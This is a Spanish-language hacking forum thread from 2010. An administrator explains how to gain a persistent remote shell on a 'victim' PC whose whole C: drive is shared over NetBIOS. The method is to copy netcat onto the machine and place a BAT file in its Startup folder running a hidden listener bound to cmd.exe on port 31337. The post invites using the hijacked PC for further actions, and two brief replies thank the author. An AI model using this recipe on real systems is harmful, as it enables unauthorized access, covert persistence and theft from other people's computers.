comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Shell via Netbios

  • 2 Respuestas
  • 2783 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5401
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 18, 2010, 12:18:43 pm »
Vamos a hablar sobre como hacernos una shell a una pc que comparte su disco via netbios

Voy a hablar sobre netbios, pero espero no hacer otro aburrio texto sobre como hackear PCs por netbios porque ya deben estar aburridos de leer lo mismo, y piensan "yo quiero avanzar sobre el tema de la seguridad informatica" todos nos estancamos en conocimientos en algun momento, pero luego uno despega ;P
Va a ser cortito, pero lo que les quiero explicar es como conseguir una shell de una forma muy elegante en el sistema remoto, y asi poder empezar a ejecutar comandos en la misma. Estamos hablando del netcat (de ahora en mas nc) y viene bien para empezar a que se familarizen con esta espectacular herramienta!! llamada 'navaja suiza' por su infinidad de opciones que nos da, segun 'hobbit' el creador de la misma, tiene como 1000 funciones + 1 Wink

Aunque parezca mentira, utilizar nc es un tema aparte. Pero voy a introducirlos un poquito en esto. Por cierto les comento, como se imaginaran es una herramienta originalmente para linux , pero fue adaptada a windows por un miembro de l0ph.
Pueden bajar nc para windows desde aca:

----->No tienes permisos para ver links. Registrate o Entra con tu cuenta<-----

Estas son algunos parametros basicos de nc, y los paso a explicar brevemente:

-d Modo Stealth. Esta opcion permite hacer funcionar al programa en background (especial para obtener una shell remota en el sistema, no?)

-e<programa> Ejecuta un programa cuando se realiza la conección a la misma (si si .. ya se .. command.com Wink )

-l -L para dejar a nc a la escucha. La diferencia entre la mayuscula y la minuscula, es que en la minuscula cuando se termina una conección no se vuelve a poner a la escucha, encambio con la mayuscula al cerrar una conección, vuelve a ponerse a la escucha Wink

-o<logfile> genera un log de las acciones de nc en hexadecimal.

-p<port> el puerto al que lo vamos a dejar en la escucha

-t Funciona como un demonio de telnet!

-v Modo verbose, nos muestra mas información de la que usualmente nos da sobre las conecciones.

Hay mas, muuuchas mas. Pero primero, obviamente, no lo se manejar a fondo este programa Sad ya aprendere mas. Y por otro lado, por ahora nos alcanzan, ya dije que tengo para rato para hablar del nc (y eso que no se usarlo ni al 20% Very Happy, asi que dense una idea ... )

Dejamos esta introducción aca sobre el netcat, para comenzar a hablar sobre Netbios.

Este tema abunda en la red, y no me voy a poner a explicar algo tan pavo. Para los no entendidos, les digo que vayan y googleen un poco. Basicamente, el Netbios es un protocolo/servicio que permite compartir archivos via la red.
Se puede 'hackear' una pc via Netbios via la linea de comandos de windows (command) pero prefiero gastar mis dedos en otra cosa, porque supongo que todos lo saben hacer. Si no googleen como dije que van a encontrar muucha información sobre el tema, y cualquier scaner lo hace. (el landguard por ejemplo)

Ok, vamos a ubicarnos en una situación. Tenemos una PC de X persona, que comparte el disco rigido entero, el C: Y podemos navegar su disco con total libertar, subir, bajar archivos, borrar, hacemos lo que queremos. Pero no podemos ejecutar archivos en su PC! ni ejecutar ordenes, ni nada. Nada mas podemos subir y bajar archivos, pero no nos alcanza Sad
Y nos fastidiamos diciendo, "no se puede hacer nada casi con esto, mas que robarle sus archivos" aca es donde entra nuestro amigo nc. Como ustedes sabran, windows tiene una carpeta llamada inicio donde al iniciar windows (valga la redundancia) ejecuta todos los archivos que estan en esa carpeta. Entonces empezamos a poner a funcionar nuestras neuronas y ... y si .... podemos poner el nc para que al iniciar windows se ejecute, y se quede a la escucha esperando nuestra conección, y asi conseguir una shell remota al sistema!
Y ahi, ademas de poder subir, bajar, borrar, editar archivos en su Pc, tambien vamos a poder ejecutar ordenes en la misma! y la cosa es mucho mas divertido Wink Podemos por ejemplo, utilizar su pc para realizar otras acciones Wink

Nota: si ya se, esto tambien se puede hacer con un troyano. Pero ... empiezen a pensar mas aya de los troyanos, esto es una utildad que la van a tener que utilizar de aca en adelante siempre, y es mucho mas elegante que utilizar un troyano.

Entonces, vamos a dejar una orden que ejecute el nc en la pc remota cuando se reinicie la PC y de ahora en adelante (en realidad, apartir de nuestro primer reiniciado, tendremos acceso remoto via shell en la pc destino!)
copiemos el nc a c: de la Pc victima, y luego vamos dependiendo la version del windows que tenga a donde esta la carpeta inicio del mismo, y dejamos el siguiente BAT.
Creando el BAT ¬¬ esto no tendria que hacer falta, pero por las dudas Very Happy
1) Abrimos un block de notas y escribimos
nc -d -L 127.0.0.1 -p 31337 -e cmd.exe
2) lo guardamos como nombre.bat
Y ahora hago un par de aclaraciones, el '31337' es el puerto donde lo voy a dejar a la escucha, le puse ese numero porque es muy bonito Smile, el "pipe" indica que todo se va a pasar por medio del cmd.exe (esto es para windowsXP, si corre un win9x deberian poner cmd.exe y si es para un linux /bin/sh)

listo! Ahora esto lo pueden probar con sus propias pcs, ejecuten esa orden, y luego hagan telnet a su propia Pc y veran como obtuvieron una shell remota Wink Aca les dejo unas imagenes para que se guien mas.

Hagamos una prueba para ver como funciona esto.
[1] Introducimos en una linea de comandos, y dejamos el nc a la escucha


[2] Nos logeamos por medio de telnet a ese puerto que dejamos a la escucha, esperando por nuestra shell


[3] Automaticamente, la obtenemos y nos quedamos con el prompt del sistema a mano ;P
Aca tire un netstat para que vean como se dio la conección aunque por ser obviamente ambas la misma PC es algo confuso... pero bueno.


Esta es una forma un poco mas elegante de obtener acceso remoto a una PC que tiene su HD compartido, sin utilizar un feo troyano ;P
Ah por cierto, el cliente telnet de windows es una basura, ya que les mostre la herramienta 'putty' mejor haganlo con esa


Desconectado hum4n3xpl01t

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Julio 27, 2013, 05:46:39 pm »

gracias por la información Antrax..
no se ven las img's pero se entiende muy bien lo explicado.

Saludos.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #2 en: Julio 27, 2013, 06:33:51 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

gracias por la información Antrax..
no se ven las img's pero se entiende muy bien lo explicado.

Saludos.
« en: Febrero 18, 2010, 12:18:43 pm »

Cierro.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



Conexion Cliente Servidor [Tool t3c4i3`s Remote Access Shell]

Iniciado por Progresive Death

Respuestas: 1
Vistas: 1931
Último mensaje Mayo 13, 2011, 02:35:37 pm
por schegell cernunnos
Subiendo Shell desde el Panel de Administracion con Upload de Imagenes

Iniciado por ZanGetsu

Respuestas: 13
Vistas: 6297
Último mensaje Octubre 14, 2013, 10:42:26 pm
por Devilboy
XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

Iniciado por Stuxnet

Respuestas: 4
Vistas: 3077
Último mensaje Noviembre 19, 2014, 07:13:03 pm
por baron.power
Usando módulos auxiliarys SSH (SECURE SHELL) [1,2] Parte

Iniciado por OswireW0rding

Respuestas: 2
Vistas: 2050
Último mensaje Marzo 12, 2014, 04:33:49 pm
por OswireW0rding
Terminos, Definiciones Exploit, Shell, Bof, Ruby

Iniciado por hackett_x87

Respuestas: 0
Vistas: 3298
Último mensaje Mayo 23, 2011, 01:30:27 am
por hackett_x87